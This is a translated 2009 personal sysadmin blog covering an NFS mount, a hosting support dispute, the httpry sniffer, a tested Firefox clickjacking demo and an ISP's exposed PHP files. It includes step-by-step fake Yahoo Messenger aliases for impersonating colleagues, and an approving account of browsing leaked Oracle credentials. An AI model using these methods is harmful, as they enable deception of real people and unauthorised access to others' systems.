/dev/rootVG/rootlv / ext3 defaults 1 1
LABEL=/boot /boot ext3 defaults 1 2
devpts /dev/pts devpts gid=5,mode=620 0 0
tmpfs /dev/shm tmpfs defaults 0 0
proc /proc proc defaults 0 0
sysfs /sys sysfs defaults 0 0
/dev/rootVG/swapLV swap swap defaults 0 0

with the addition


/dev/rootVG/rootlv / ext3 defaults 1 1
LABEL=/boot /boot ext3 defaults 1 2
devpts /dev/pts devpts gid=5,mode=620 0 0
tmpfs /dev/shm tmpfs defaults 0 0
proc /proc proc defaults 0 0
sysfs /sys sysfs defaults 0 0
/dev/rootVG/swapLV swap swap defaults 0 0
192.168.140.22:/data/app/iqbal /data/app/iqbal nfs auto,rw,nodev,nosuid,nolock,sync,_netdev,proto=udp,retry=10,rsize=32768,wsize=32768,hard,intr 0 0

#mkdir /data/app/iqbal

#mount -a

#df -hT

result

Filesystem Type Size Used Avail Use% Mounted on
/dev/mapper/rootVG-rootlv
ext3 74G 30G 41G 42% /
/dev/cciss/c0d0p1
ext3 99M 30M 64M 32% /boot
tmpfs tmpfs 3.9G 0 3.9G 0% /dev/shm
192.168.140.22:/data/app/iqbal
nfs 1.0T 8.5G 1016G 1% /data/app/iqbal

simple, right !!! NFS - original - addition - result ...

Frequency oh Frequency

Here is a link about frequency usage, published by the government and postel ...........


http://www.postel.go.id/content/ID/regulasi/frekuensi/kepmen/pm%207.pdf

reading the indowli mailing list, it is said that the 2.4 frequency is no longer free .... is that true ???? ..................................

Wednesday, January 28, 2009

Idiotique ........ or what ???? in the biggest hosting ....

iqbal: good morning ma'am / sir
iqbal: I'd like to ask, is there still a problem with access to the site www.xxxxxxxxxxxxx.net
pt_mwn_supp10: one moment, let me check
pt_mwn_supp10: it still shows sorry; it seems your website has hit a limit on our server
iqbal: oww
iqbal: until when
iqbal: the start of the month ?
pt_mwn_supp10: On the shared hosting service, for visitor activity that can be expected to be busy like that, we suggest you upgrade to a server package (Colocation/Dedicated). With Colocation/Dedicated there are no limits, because that server is used only by your own users.
iqbal: there are only a few users
iqbal: but maybe it was busy yesterday
iqbal: the quota used is still small
iqbal: huh
iqbal: Average 394.04 1232.22 8797.33 156.06 MB
Total 10639 33270 237528 4.11 GB
iqbal: only 4 GB so far
iqbal: even last month
iqbal: Average 381.84 973.81 9263.13 156.61 MB
Total 11837 30188 287157 4.74 GB
iqbal: try comparing them
iqbal: that doesn't even reach 20 GB
iqbal: huh
iqbal: what's going on ?
iqbal: http://id.masterweb.net/layanan_harga_hosting.html
pt_mwn_supp10: The sorry message will disappear once the activity on your web is below the limit we give
iqbal: what is the limit ?
iqbal: this hasn't even reached 5 GB
iqbal: take a look at the statistics
iqbal: spanel
iqbal: in awstats
pt_mwn_supp10: May I know the range of visitors to your web per day
iqbal: 6611
10639
(1.6 visits/visitor) 33270
(3.12 pages/visit) 237528
(22.32 hits/visit) 4.11 GB
(405.55 KB/visit)
iqbal: the bandwidth available is 20 GB, right
iqbal: this site, in not yet 1 month = 4.11 GB
iqbal: bw usage has never reached 20 GB
iqbal: never even 10 GB
iqbal: on average < 5 GB
pt_mwn_supp10: if your visitors reach around 6000 per day, that is quite a lot, sir
iqbal: but doesn't it depend on the gigabyte quota limit
iqbal: right
iqbal: not the visitors
pt_mwn_supp10: for the record, we have a client with a visitor range of around 4000 who also got the sorry page; in the end that client made use of our vps service
iqbal: isn't it the gigabyte limit
iqbal: here is the limit
pt_mwn_supp10: if it is bandwidth, the error is usually bandwidth limit exceeded
iqbal: so are the statistics provided by master web based on bandwidth or on concurrent users ?
iqbal: but hosting limits are based on bandwidth quota
iqbal: not on visitors
iqbal: sorry, who am I speaking with
pt_mwn_supp10: the statistics at MWN are for finding out how many visitors come to your website as well as the data transfer you do
iqbal: right
iqbal: what about awstats
iqbal: the one from MWN, is it not valid ?
iqbal: 4.11 GB
iqbal: that's all
pt_mwn_supp10: We always generate the statistics data every day
iqbal: so which is it really based on
iqbal: visitors
iqbal: or bandwidth
iqbal: We are sorry, your request cannot be completed because the server is under maintenance. Please try again a few minutes later.

Maaf, halaman yang Anda inginkan belum dapat ditampilkan karena server sedang maintenance. Harap mencoba beberapa menit lagi.
iqbal: in my opinion this is not logical
iqbal: shouldn't hosting be based on the bandwidth quota
iqbal: not per concurrent user
pt_mwn_supp10: There are several factors: first, the visitors; second, you are using a large amount of mysql or apache
pt_mwn_supp10: Try temporarily moving the data on your website to the home folder, not the ww folder
pt_mwn_supp10: then check whether your website still displays or still shows sorry
iqbal: ok let me try ...
iqbal: this has already been chmod-ed
iqbal: still the same
iqbal: if apache usage is large
iqbal: and mysql usage is large
iqbal: then that means there is an attack
iqbal: I want to know whether awstats is actually valid or not?
iqbal: may I know who I am speaking with?

nb : offered a VPS .... do I look rich? where would I get the money to buy something like that ... if I had it I could do the hardening myself ... if someone wants to donate, that's fine .... this site is a community site for public knowledge ... open source fanatics, security lovers and others

1. Is the Awstats that is provided valid or not?
2. Is hosting based on bandwidth quota or on visitors ...
3. It turns out he is a marketing person ... but the YM account is technical support ... or a double job ...
4. This site's quota has never reached 10 GB, far from it ... it has never even reached 5 GB ...
5. A DDoS attack from where? ... couldn't it be blocked at my router

Friday, January 23, 2009

httpry - http packet sniffer logging

source : http://www.packetstormsecurity.com/sniffers/httpry-0.1.4.tar.gz

Description:
httpry is a specialized packet sniffer designed for displaying and logging HTTP traffic. It is not intended to perform analysis itself, but instead to capture, parse, and log the traffic for later analysis. It can be run in real-time displaying the live traffic on the wire, or as a daemon process that logs to an output file. It is written to be as lightweight and flexible as possible, so that it can be easily adaptable to different applications. It does not display the raw HTTP data transferred, but instead focuses on parsing and displaying the request/response line along with associated header fields.
Author: Dumpster Keeper
Homepage: http://dumpsterventures.com/jason/httpry/
Changes: Adds a few nice improvements to the base program. The biggest change is that the program now defaults to parsing all standard HTTP methods.
File Size: 44477
Last Modified: Jan 13 19:13:48 2009
MD5 Checksum: ab5cdae9317908bac3c67fb9f26cf00e

extract

make
make install


root@boc [~/httpry-0.1.4]# ./httpry -i eth1
httpry version 0.1.4 -- HTTP logging and information retrieval tool
Copyright (c) 2005-2009 Jason Bittel
Starting capture on eth1 interface
2009-01-23 14:57:41 10.11.12.66 10.11.21.200 > GET 10.11.21.200 / HTTP/1.1 - -
2009-01-23 14:57:41 10.11.21.200 10.11.12.66 < - - - HTTP/1.1 200 OK
2009-01-23 15:00:25 10.11.12.66 10.11.21.200 > GET 10.11.21.200 / HTTP/1.1 - -
2009-01-23 15:00:25 10.11.21.200 10.11.12.66 < - - - HTTP/1.1 200 OK
2009-01-23 15:01:02 10.11.12.66 10.11.21.200 > POST 10.11.21.200 /index.php HTTP/1.1 - -
2009-01-23 15:01:02 10.11.21.200 10.11.12.66 < - - - HTTP/1.1 200 OK
2009-01-23 15:01:06 10.11.12.66 10.11.21.200 > POST 10.11.21.200 /index.php HTTP/1.1 - -
2009-01-23 15:01:06 10.11.21.200 10.11.12.66 < - - - HTTP/1.1 200 OK
2009-01-23 15:01:06 10.11.21.200 10.11.12.66 < - - - HTTP/1.1 200 OK
2009-01-23 15:01:07 10.11.21.200 10.11.12.66 < - - - HTTP/1.1 200 OK
2009-01-23 15:01:16 10.11.12.66 10.11.21.200 > POST 10.11.21.200 /index.php HTTP/1.1 - -
2009-01-23 15:01:32 10.11.21.200 10.11.12.66 < - - - HTTP/1.1 200 OK
2009-01-23 15:28:42 10.11.21.200 10.11.15.171 > GET yum.telkom.net.id /rhe5-i386/epel/repodata/repomd.xml HTTP/1.1 - -
2009-01-23 15:28:42 10.11.15.171 10.11.21.200 < - - - HTTP/1.1 200 OK
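
httpry leaves the analysis to other tools, so here is an added example (not part of the original post or of httpry) that parses log lines in the whitespace-separated layout seen in the capture above and pairs each response with the oldest unanswered request on the same client/server flow. The sample lines, field names and function names are constructed for illustration.

```python
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample; assumed layout, read off the capture above:
# date time src dst direction method host uri version status reason
SAMPLE_LOG = """\
2009-01-23 15:01:02 10.11.12.66 10.11.21.200 > POST 10.11.21.200 /index.php HTTP/1.1 - -
2009-01-23 15:01:02 10.11.21.200 10.11.12.66 < - - - HTTP/1.1 200 OK
2009-01-23 15:01:16 10.11.12.66 10.11.21.200 > POST 10.11.21.200 /index.php HTTP/1.1 - -
2009-01-23 15:01:32 10.11.21.200 10.11.12.66 < - - - HTTP/1.1 200 OK
2009-01-23 15:02:00 10.11.12.66 10.11.21.200 > GET 10.11.21.200 /missing HTTP/1.1 - -
2009-01-23 15:02:00 10.11.21.200 10.11.12.66 < - - - HTTP/1.1 404 Not Found
2009-01-23 15:03:10 10.11.12.66 10.11.21.200 > GET 10.11.21.200 / HTTP/1.1 - -
"""

FIELDS = "src dst direction method host uri version status reason".split()

def parse_line(line):
    """Return one log line as a dict, or None for banners and malformed lines."""
    parts = line.split(None, 10)  # the reason phrase may contain spaces
    if len(parts) != 11 or parts[4] not in (">", "<"):
        return None
    try:
        ts = datetime.strptime(parts[0] + " " + parts[1], "%Y-%m-%d %H:%M:%S")
    except ValueError:
        return None
    return dict(zip(FIELDS, (p.strip() for p in parts[2:])), time=ts)

def pair_transactions(text):
    """Match each response to the oldest unanswered request on the same flow."""
    pending = defaultdict(deque)  # (client, server) -> requests awaiting a reply
    paired, orphans = [], []
    for rec in filter(None, map(parse_line, text.splitlines())):
        if rec["direction"] == ">":
            pending[(rec["src"], rec["dst"])].append(rec)
            continue
        queue = pending[(rec["dst"], rec["src"])]
        if not queue:
            orphans.append(rec)  # response with no request seen in the log
            continue
        req = queue.popleft()
        status = int(rec["status"]) if rec["status"].isdigit() else None
        delay = (rec["time"] - req["time"]).total_seconds()
        paired.append((req["src"], req["method"], req["uri"], status, delay))
    unanswered = [r for q in pending.values() for r in q]
    return paired, unanswered, orphans

if __name__ == "__main__":
    pairs, unanswered, orphans = pair_transactions(SAMPLE_LOG)
    for client, method, uri, status, delay in pairs:
        print(client, method, uri, status, f"{delay:.0f}s")
```

The log carries no port numbers, so pairing is per IP pair and only approximate when a client has several connections open. Unanswered requests, orphan responses and long delays such as the 16-second POST are the entries worth a closer look.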

keep analyzing ....

lately I have been enjoying reading packetstormsecurity, an audit site I had left behind for a long time .... and now I am finally reading it again ....

Firefox Clickjacking 3.05

This morning I casually visited http://www.packetstormsecurity.com/ and found an interesting read, and I happen to use the application it covers

http://www.packetstormsecurity.com/0901-exploits/firefox-clickjack.txt


Firefox 3.0.5 Status Bar Obfuscation / Clickjacking


I saved it as hijack.html

I opened it in the Mozilla 3.05 browser

at a glance the link points to google

but it turns out

it loads javascript .... to milw0rm

tha thaaaaaaaaaa ....

it goes to milw0rm ...

test with JavaScript disabled ...

it actually goes to google

so this shows how dangerous clickjacking is, especially when it is used for phishing ...

- hooray, Monday is a holiday .............

Thursday, January 22, 2009

hacking heart by yahoo messenger - social engineering

Here is a funny story from about 9 months ago, when I moved to a new department at a new place ... handling the systems ... and their development. Naturally I got introduced to my new colleagues ... and added them on Yahoo Messenger ... I always gave these new friends my real ID, but on my own YM I created 5 IDs to use for social engineering ( fake IDs ); it is quite easy

1. yahoo messenger - messenger - my account info - enter password ( verify )
2. Edit/Create Aliases - add new alias - ok, then log out of your YM
3. log in again - then choose your victim

now you can social engineer - the way to do it is to use a nick that closely resembles your friend's ... then pretend to ask something .. until

fake-nick perpetrator : let's go and eat now
victim : it's unusual for you to ask like that?
fake-nick perpetrator : well, I'll wait outside the room, okay, I miss you ...
victim : really?
fake-nick perpetrator : of course, why would I lie
victim : ok

the victim then walks out, looking around and waiting for the friend ( the real person )

the victim waits ten minutes, then goes up to the real person and says

victim : so are we eating or not?
real person : who invited you?
victim : huh, just now on yahoo messenger
real person : ugh, you're flattering yourself ...
victim : "face turns red" <---- it turns out there were feelings ....

from the illustration above it looks easy, doesn't it ... the social engineering done by the perpetrator .. and there are thousands more kinds of social engineering being done ...

sorry, the purpose here was only an experiment ... don't imitate it

hmm .... let me find new place and work again ....... help me god //\\

Wednesday, January 21, 2009

friendster vs facebook

just for fun, comparing the 2 biggest community sites in the world ....

facebook's visitor growth is pretty crazy compared to friendster, which has not moved ... is this the fall of friendster's glory? .... if friendster is willing to change its system maybe it can recover ... with new improvements .....

nb :
failed again, so I'll search again ..... still walking in place ... stay motivated !!! , as long as there is still a road, as long as the world still turns and as long as hope still stretches wide ....

Sunday, January 18, 2009

Strange WordPress on free hosting

journal :

This time, installing wordpress on freeweb7.com was awful: creating the database was ok, but when it came to connecting it would not connect and the site just sat idle :D , after 1 minute it connected again ... but in the end it worked ... as long as the earth turns on its axis ..

today I am learning to share ... transferring knowledge to someone far away ... I introduced wordpress to that person ...

today ...

saturday - sunday ...

saturday : woke up at 11 am
haircut at 2
to the internet cafe to check the server first, 3-7
internet + install, 10 to 3 in the morning

sunday : sleep ....

Monday, January 12, 2009

View Source code = Vsc

Actually I want to share how vulnerable a bug is that I found on the site of one of the biggest ISPs in Indonesia, one that provides 3G-based services. My exploration began when I casually wondered what its source code looked like ....

it turned out there were files in php form there ... so I ended up studying those files and even viewing all the php files, simple but painful,
until I traced the connect API file for oracle. Reading the php source code turned out to be enjoyable, even though I am usually most reluctant to read php programming; I prefer application-based servers ... in tar.gz form

if only I had toad installed I could have messed around in its database, provided I did not run straight into a firewall. I saw all the passwords and server hosts, and I even studied its load balancer towards that oracle.

I have reported this, but there seems to be no reply yet ...

oh well, this manual method turns out to be beautiful ///

nb : finally the laptop got fixed, the world really feels empty without a computer ... I'd like to look for a challenge at another place ... if possible, my heart wants to be an NE; the panic is what makes it fun when there is an outage :D

Thursday, January 08, 2009

Happy New York !!!

Those words came out of the mouth of a friend of mine. Maybe because he is rather funny, he even said "how come I got an sms like this, happy new york". He is only a high school graduate who does not understand English at all ... "he even said how am I supposed to speak English when every day I only eat tempe orek", when it was actually happy new year; I laughed myself half to death ...

HAPPY NEW YEAR 2009

Apologies for any wrong words or criticism; this is meant as learning and is not intended to corner human stupidity, idiocy and madness.

what is certain is that I will keep writing things that are useful for the progress of IT in Indonesia.

regards

iqbal